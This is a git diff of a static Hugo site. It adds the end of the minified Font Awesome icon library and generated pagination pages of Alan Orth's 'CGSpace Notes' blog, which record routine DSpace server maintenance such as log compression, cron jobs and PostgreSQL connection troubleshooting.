0;\n  left: 0;\n  margin: auto;\n  position: absolute;\n  right: 0;\n  top: 0;\n}\n\n.fa-layers {\n  display: inline-block;\n  height: 1em;\n  position: relative;\n  text-align: center;\n  vertical-align: -0.125em;\n  width: 1em;\n}\n.fa-layers svg.svg-inline--fa {\n  -webkit-transform-origin: center center;\n          transform-origin: center center;\n}\n\n.fa-layers-counter, .fa-layers-text {\n  display: inline-block;\n  position: absolute;\n  text-align: center;\n}\n\n.fa-layers-text {\n  left: 50%;\n  top: 50%;\n  -webkit-transform: translate(-50%, -50%);\n          transform: translate(-50%, -50%);\n  -webkit-transform-origin: center center;\n          transform-origin: center center;\n}\n\n.fa-layers-counter {\n  background-color: #ff253a;\n  border-radius: 1em;\n  -webkit-box-sizing: border-box;\n          box-sizing: border-box;\n  color: #fff;\n  height: 1.5em;\n  line-height: 1;\n  max-width: 5em;\n  min-width: 1.5em;\n  overflow: hidden;\n  padding: 0.25em;\n  right: 0;\n  text-overflow: ellipsis;\n  top: 0;\n  -webkit-transform: scale(0.25);\n          transform: scale(0.25);\n  -webkit-transform-origin: top right;\n          transform-origin: top right;\n}\n\n.fa-layers-bottom-right {\n  bottom: 0;\n  right: 0;\n  top: auto;\n  -webkit-transform: scale(0.25);\n          transform: scale(0.25);\n  -webkit-transform-origin: bottom right;\n          transform-origin: bottom right;\n}\n\n.fa-layers-bottom-left {\n  bottom: 0;\n  left: 0;\n  right: auto;\n  top: auto;\n  -webkit-transform: scale(0.25);\n          transform: scale(0.25);\n  -webkit-transform-origin: bottom left;\n          transform-origin: bottom left;\n}\n\n.fa-layers-top-right {\n  right: 0;\n  top: 0;\n  -webkit-transform: scale(0.25);\n          transform: scale(0.25);\n  -webkit-transform-origin: top right;\n          transform-origin: top right;\n}\n\n.fa-layers-top-left {\n  left: 0;\n  right: auto;\n  top: 0;\n  -webkit-transform: scale(0.25);\n          transform: scale(0.25);\n  -webkit-transform-origin: top left;\n          transform-origin: top left;\n}\n\n.fa-lg {\n  font-size: 1.3333333333em;\n  line-height: 0.75em;\n  vertical-align: -0.0667em;\n}\n\n.fa-xs {\n  font-size: 0.75em;\n}\n\n.fa-sm {\n  font-size: 0.875em;\n}\n\n.fa-1x {\n  font-size: 1em;\n}\n\n.fa-2x {\n  font-size: 2em;\n}\n\n.fa-3x {\n  font-size: 3em;\n}\n\n.fa-4x {\n  font-size: 4em;\n}\n\n.fa-5x {\n  font-size: 5em;\n}\n\n.fa-6x {\n  font-size: 6em;\n}\n\n.fa-7x {\n  font-size: 7em;\n}\n\n.fa-8x {\n  font-size: 8em;\n}\n\n.fa-9x {\n  font-size: 9em;\n}\n\n.fa-10x {\n  font-size: 10em;\n}\n\n.fa-fw {\n  text-align: center;\n  width: 1.25em;\n}\n\n.fa-ul {\n  list-style-type: none;\n  margin-left: 2.5em;\n  padding-left: 0;\n}\n.fa-ul > li {\n  position: relative;\n}\n\n.fa-li {\n  left: -2em;\n  position: absolute;\n  text-align: center;\n  width: 2em;\n  line-height: inherit;\n}\n\n.fa-border {\n  border: solid 0.08em #eee;\n  border-radius: 0.1em;\n  padding: 0.2em 0.25em 0.15em;\n}\n\n.fa-pull-left {\n  float: left;\n}\n\n.fa-pull-right {\n  float: right;\n}\n\n.fa.fa-pull-left,\n.fas.fa-pull-left,\n.far.fa-pull-left,\n.fal.fa-pull-left,\n.fab.fa-pull-left {\n  margin-right: 0.3em;\n}\n.fa.fa-pull-right,\n.fas.fa-pull-right,\n.far.fa-pull-right,\n.fal.fa-pull-right,\n.fab.fa-pull-right {\n  margin-left: 0.3em;\n}\n\n.fa-spin {\n  -webkit-animation: fa-spin 2s infinite linear;\n          animation: fa-spin 2s infinite linear;\n}\n\n.fa-pulse {\n  -webkit-animation: fa-spin 1s infinite steps(8);\n          animation: fa-spin 1s infinite steps(8);\n}\n\n@-webkit-keyframes fa-spin {\n  0% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n  100% {\n    -webkit-transform: rotate(360deg);\n            transform: rotate(360deg);\n  }\n}\n\n@keyframes fa-spin {\n  0% {\n    -webkit-transform: rotate(0deg);\n            transform: rotate(0deg);\n  }\n  100% {\n    -webkit-transform: rotate(360deg);\n            transform: rotate(360deg);\n  }\n}\n.fa-rotate-90 {\n  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=1)";\n  -webkit-transform: rotate(90deg);\n          transform: rotate(90deg);\n}\n\n.fa-rotate-180 {\n  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2)";\n  -webkit-transform: rotate(180deg);\n          transform: rotate(180deg);\n}\n\n.fa-rotate-270 {\n  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=3)";\n  -webkit-transform: rotate(270deg);\n          transform: rotate(270deg);\n}\n\n.fa-flip-horizontal {\n  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)";\n  -webkit-transform: scale(-1, 1);\n          transform: scale(-1, 1);\n}\n\n.fa-flip-vertical {\n  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";\n  -webkit-transform: scale(1, -1);\n          transform: scale(1, -1);\n}\n\n.fa-flip-both, .fa-flip-horizontal.fa-flip-vertical {\n  -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)";\n  -webkit-transform: scale(-1, -1);\n          transform: scale(-1, -1);\n}\n\n:root .fa-rotate-90,\n:root .fa-rotate-180,\n:root .fa-rotate-270,\n:root .fa-flip-horizontal,\n:root .fa-flip-vertical,\n:root .fa-flip-both {\n  -webkit-filter: none;\n          filter: none;\n}\n\n.fa-stack {\n  display: inline-block;\n  height: 2em;\n  position: relative;\n  width: 2.5em;\n}\n\n.fa-stack-1x,\n.fa-stack-2x {\n  bottom: 0;\n  left: 0;\n  margin: auto;\n  position: absolute;\n  right: 0;\n  top: 0;\n}\n\n.svg-inline--fa.fa-stack-1x {\n  height: 1em;\n  width: 1.25em;\n}\n.svg-inline--fa.fa-stack-2x {\n  height: 2em;\n  width: 2.5em;\n}\n\n.fa-inverse {\n  color: #fff;\n}\n\n.sr-only {\n  border: 0;\n  clip: rect(0, 0, 0, 0);\n  height: 1px;\n  margin: -1px;\n  overflow: hidden;\n  padding: 0;\n  position: absolute;\n  width: 1px;\n}\n\n.sr-only-focusable:active, .sr-only-focusable:focus {\n  clip: auto;\n  height: auto;\n  margin: 0;\n  overflow: visible;\n  position: static;\n  width: auto;\n}\n\n.svg-inline--fa .fa-primary {\n  fill: var(--fa-primary-color, currentColor);\n  opacity: 1;\n  opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa .fa-secondary {\n  fill: var(--fa-secondary-color, currentColor);\n  opacity: 0.4;\n  opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-primary {\n  opacity: 0.4;\n  opacity: var(--fa-secondary-opacity, 0.4);\n}\n\n.svg-inline--fa.fa-swap-opacity .fa-secondary {\n  opacity: 1;\n  opacity: var(--fa-primary-opacity, 1);\n}\n\n.svg-inline--fa mask .fa-primary,\n.svg-inline--fa mask .fa-secondary {\n  fill: black;\n}\n\n.fad.fa-inverse {\n  color: #fff;\n}';if(e!==t||a!==n){var i=new RegExp("\\.".concat(t,"\\-"),"g"),o=new RegExp("\\--".concat(t,"\\-"),"g"),c=new RegExp("\\.".concat(n),"g");r=r.replace(i,".".concat(e,"-")).replace(o,"--".concat(e,"-")).replace(c,".".concat(a))}return r}function vn(){R.autoAddCss&&!wn&&(dt(gn()),wn=!0)}function bn(t,n){return Object.defineProperty(t,"abstract",{get:n}),Object.defineProperty(t,"html",{get:function(){return t.abstract.map((function(t){return Yt(t)}))}}),Object.defineProperty(t,"node",{get:function(){if(v){var n=p.createElement("div");return n.innerHTML=t.html,n.children}}}),t}var yn=new(function(){function t(){!function(t,n){if(!(t instanceof n))throw new TypeError("Cannot call a class as a function")}(this,t),this.definitions={}}var n,a;return n=t,a=[{key:"add",value:function(){for(var t=this,n=arguments.length,e=new Array(n),a=0;a<n;a++)e[a]=arguments[a];var i=e.reduce(this._pullDefinitions,{});Object.keys(i).forEach((function(n){t.definitions[n]=r({},t.definitions[n]||{},i[n]),zt(n,i[n]),Rt()}))}},{key:"reset",value:function(){this.definitions={}}},{key:"_pullDefinitions",value:function(t,n){var e=n.prefix&&n.iconName&&n.icon?{0:n}:n;return Object.keys(e).map((function(n){var a=e[n],r=a.prefix,i=a.iconName,o=a.icon;t[r]||(t[r]={}),t[r][i]=o})),t}}],a&&e(n.prototype,a),t}()),wn=!1,xn={i2svg:function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{};if(v){vn();var n=t.node,e=void 0===n?p:n,a=t.callback,r=void 0===a?function(){}:a;return R.searchPseudoElements&&hn(e),ln(e,r)}return lt.reject("Operation requires a DOM of some kind.")},css:gn,insertCss:function(){wn||(dt(gn()),wn=!0)},watch:function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=t.autoReplaceSvgRoot,e=t.observeMutationsRoot;!1===R.autoReplaceSvg&&(R.autoReplaceSvg=!0),R.observeMutations=!0,V((function(){_n({autoReplaceSvgRoot:n}),Jt({treeCallback:ln,nodeCallback:un,pseudoElementsCallback:hn,observeMutationsRoot:e})}))}},kn=(function(t){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=n.transform,a=void 0===e?mt:e,i=n.symbol,o=void 0!==i&&i,c=n.mask,s=void 0===c?null:c,f=n.maskId,l=void 0===f?null:f,u=n.title,m=void 0===u?null:u,d=n.titleId,p=void 0===d?null:d,h=n.classes,g=void 0===h?[]:h,v=n.attributes,b=void 0===v?{}:v,y=n.styles,w=void 0===y?{}:y;if(t){var x=t.prefix,k=t.iconName,_=t.icon;return bn(r({type:"icon"},t),(function(){return vn(),R.autoA11y&&(m?b["aria-labelledby"]="".concat(R.replacementClass,"-title-").concat(p||pt()):(b["aria-hidden"]="true",b.focusable="false")),_t({icons:{main:on(_),mask:s?on(s.icon):{found:!1,width:null,height:null,icon:{}}},prefix:x,iconName:k,transform:r({},mt,a),symbol:o,title:m,maskId:l,titleId:p,extra:{attributes:b,styles:w,classes:g}})}))}},xn),_n=function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},n=t.autoReplaceSvgRoot,e=void 0===n?p:n;(Object.keys(H.styles).length>0||R.autoFetchSvg)&&v&&R.autoReplaceSvg&&kn.i2svg({node:e})};yn.add({prefix:"fas",iconName:"folder",icon:[512,512,[],"f07b","M464 128H272l-64-64H48C21.49 64 0 85.49 0 112v288c0 26.51 21.49 48 48 48h416c26.51 0 48-21.49 48-48V176c0-26.51-21.49-48-48-48z"]},{prefix:"fas",iconName:"tag",icon:[512,512,[],"f02b","M0 252.118V48C0 21.49 21.49 0 48 0h204.118a48 48 0 0 1 33.941 14.059l211.882 211.882c18.745 18.745 18.745 49.137 0 67.882L293.823 497.941c-18.745 18.745-49.137 18.745-67.882 0L14.059 286.059A48 48 0 0 1 0 252.118zM112 64c-26.51 0-48 21.49-48 48s21.49 48 48 48 48-21.49 48-48-21.49-48-48-48z"]}),yn.add({prefix:"fab",iconName:"facebook-f",icon:[320,512,[],"f39e","M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z"]},{prefix:"fab",iconName:"twitter",icon:[512,512,[],"f099","M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z"]},{prefix:"fab",iconName:"linkedin-in",icon:[448,512,[],"f0e1","M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z"]}),xn.watch()})();
\ No newline at end of file
diff --git a/docs/page/1/index.html b/docs/page/1/index.html
new file mode 100644
index 000000000..76a4b477b
--- /dev/null
+++ b/docs/page/1/index.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en-us">
+  <head>
+    <title>https://alanorth.github.io/cgspace-notes/</title>
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+    <meta name="robots" content="noindex">
+    <meta charset="utf-8">
+    <meta http-equiv="refresh" content="0; url=https://alanorth.github.io/cgspace-notes/">
+  </head>
+</html>
diff --git a/docs/page/10/index.html b/docs/page/10/index.html
new file mode 100644
index 000000000..6dd3f4b96
--- /dev/null
+++ b/docs/page/10/index.html
@@ -0,0 +1,325 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-04/">April, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-04-04T11:06:00+03:00">Mon Apr 04, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-04-04">2016-04-04</h2>
+<ul>
+<li>Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit</li>
+<li>We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc</li>
+<li>After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!</li>
+<li>This will save us a few gigs of backup space we&rsquo;re paying for on S3</li>
+<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-03/">March, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-03-02T16:50:00+03:00">Wed Mar 02, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-03-02">2016-03-02</h2>
+<ul>
+<li>Looking at issues with author authorities on CGSpace</li>
+<li>For some reason we still have the <code>index-lucene-update</code> cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module</li>
+<li>Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-02/">February, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-02-05T13:18:00+03:00">Fri Feb 05, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-02-05">2016-02-05</h2>
+<ul>
+<li>Looking at some DAGRIS data for Abenet Yabowork</li>
+<li>Lots of issues with spaces, newlines, etc causing the import to fail</li>
+<li>I noticed we have a very <em>interesting</em> list of countries on CGSpace:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/02/cgspace-countries.png" alt="CGSpace country list"></p>
+<ul>
+<li>Not only are there 49,000 countries, we have some blanks (25)&hellip;</li>
+<li>Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-01/">January, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-01-13T13:18:00+03:00">Wed Jan 13, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-01-13">2016-01-13</h2>
+<ul>
+<li>Move ILRI collection <code>10568/12503</code> from <code>10568/27869</code> to <code>10568/27629</code> using the <a href="https://gist.github.com/alanorth/392c4660e8b022d99dfa">move_collections.sh</a> script I wrote last year.</li>
+<li>I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.</li>
+<li>Update GitHub wiki for documentation of <a href="https://github.com/ilri/DSpace/wiki/Maintenance-Tasks">maintenance tasks</a>.</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2015-12/">December, 2015</a></h2>
+    <p class="blog-post-meta"><time datetime="2015-12-02T13:18:00+03:00">Wed Dec 02, 2015</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2015-12-02">2015-12-02</h2>
+<ul>
+<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li>
+</ul>
+<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2015-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2015-11/">November, 2015</a></h2>
+    <p class="blog-post-meta"><time datetime="2015-11-23T17:00:57+03:00">Mon Nov 23, 2015</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2015-11-22">2015-11-22</h2>
+<ul>
+<li>CGSpace went down</li>
+<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
+<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
+78
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2015-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/page/9/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary disabled" href="#" role="button" aria-disabled="true">Next page</a>
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/page/2/index.html b/docs/page/2/index.html
new file mode 100644
index 000000000..1f046c236
--- /dev/null
+++ b/docs/page/2/index.html
@@ -0,0 +1,449 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="CGSpace Notes" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="CGSpace Notes"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link active" href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-09/">September, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-09-01T09:41:36+03:00">Thu Sep 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-09-01">2022-09-01</h2>
+<ul>
+<li>A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet</li>
+<li>I tested an item submission on DSpace Test with the Cocoon <code>org.apache.cocoon.uploads.autosave=false</code> change
+<ul>
+<li>The submission works as expected</li>
+</ul>
+</li>
+<li>Start debugging some region-related issues with csv-metadata-quality
+<ul>
+<li>I created a new test file <code>test-geography.csv</code> with some different scenarios</li>
+<li>I also fixed a few bugs and improved the region-matching logic</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-08/">August, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-08-01T10:22:36+03:00">Mon Aug 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-08-01">2022-08-01</h2>
+<ul>
+<li>Our request to add <a href="https://github.com/spdx/license-list-XML/issues/1525">CC-BY-3.0-IGO to SPDX</a> was approved a few weeks ago</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-07/">July, 2022</a></h2>
